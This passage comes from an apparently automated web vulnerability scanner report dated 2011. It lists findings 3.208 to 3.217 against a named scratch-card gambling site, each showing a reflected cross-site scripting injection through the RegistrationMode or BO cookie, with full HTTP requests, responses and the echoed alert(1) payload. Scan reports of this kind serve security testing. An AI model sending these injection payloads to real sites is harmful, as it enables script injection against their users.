...[SNIP]...

3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7c1"-alert(1)-"b48b5658b40 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMcf7c1"-alert(1)-"b48b5658b40; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMcf7c1"-alert(1)-"b48b5658b40; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMcf7c1"-alert(1)-"b48b5658b40";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FAQ.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95447"-alert(1)-"1a57c958de9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM95447"-alert(1)-"1a57c958de9; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: BO=FM95447"-alert(1)-"1a57c958de9; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM95447"-alert(1)-"1a57c958de9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FAQ.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 310e5"-alert(1)-"56ed7a9f575 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM310e5"-alert(1)-"56ed7a9f575; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM310e5"-alert(1)-"56ed7a9f575; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM310e5"-alert(1)-"56ed7a9f575";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f934b"-alert(1)-"6a6d8ca2d08 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMf934b"-alert(1)-"6a6d8ca2d08; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: BO=FMf934b"-alert(1)-"6a6d8ca2d08; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf934b"-alert(1)-"6a6d8ca2d08";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b8e"-alert(1)-"d880c313d6c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM57b8e"-alert(1)-"d880c313d6c; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM57b8e"-alert(1)-"d880c313d6c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM57b8e"-alert(1)-"d880c313d6c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 185cc"-alert(1)-"130a72d91c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM185cc"-alert(1)-"130a72d91c; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: BO=FM185cc"-alert(1)-"130a72d91c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM185cc"-alert(1)-"130a72d91c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1333"-alert(1)-"964b23fefd3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMa1333"-alert(1)-"964b23fefd3; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa1333"-alert(1)-"964b23fefd3; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa1333"-alert(1)-"964b23fefd3";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.215. http://www.bigmoneyscratch.com/Home.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d67"-alert(1)-"00fd2eea37f was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM70d67"-alert(1)-"00fd2eea37f; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: BO=FM70d67"-alert(1)-"00fd2eea37f; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM70d67"-alert(1)-"00fd2eea37f";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.216. http://www.bigmoneyscratch.com/Home.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 380a7"-alert(1)-"bce14838cf was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM380a7"-alert(1)-"bce14838cf; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:09:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM380a7"-alert(1)-"bce14838cf; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:09:05 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM380a7"-alert(1)-"bce14838cf";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.217. http://www.bigmoneyscratch.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a03"-alert(1)-"29adba2d383 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM13a03"-alert(1)-"29adba2d383; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: BO=FM13a03"-alert(1)-"29adba2d383; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
